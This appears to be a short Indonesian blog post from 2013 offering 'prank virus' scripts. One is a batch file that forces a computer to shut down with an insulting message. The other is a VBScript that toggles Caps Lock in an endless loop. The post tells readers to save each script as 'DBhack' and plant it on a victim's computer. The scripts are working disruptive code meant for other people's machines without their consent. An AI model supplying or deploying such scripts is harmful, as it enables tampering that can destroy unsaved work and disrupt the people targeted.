Coccinellidae Lady Bug

19 April 2013

Buat Shut Down Komputer dengan Virus

Ini buat para orang-orang jahil,....
Buat komputer teman kamu Force Shut Down ama buat tombol CapsLock Nyala terus
Coba ya kawan
clip_image002
1. Membuat komputer Force Shut Down
  • Buka Notepad ;
  • Masukkan script dibawah ini :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
  • Simpan dengan nama file DBhack.BAT dan tipe All File ;
  • Sebarkan di komputer Korban .

2. Membuat Tombol Caps Lock Menyala Terus
  • Buka Notepad ;
  • Masukkan script dibawah ini :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  • Simpan kode script tersebut , dengan nama file DBhack.VBS dan tipe All File ;
  • Jangan lupa , sebarkan di komputer si korban .

Tidak ada komentar:

Posting Komentar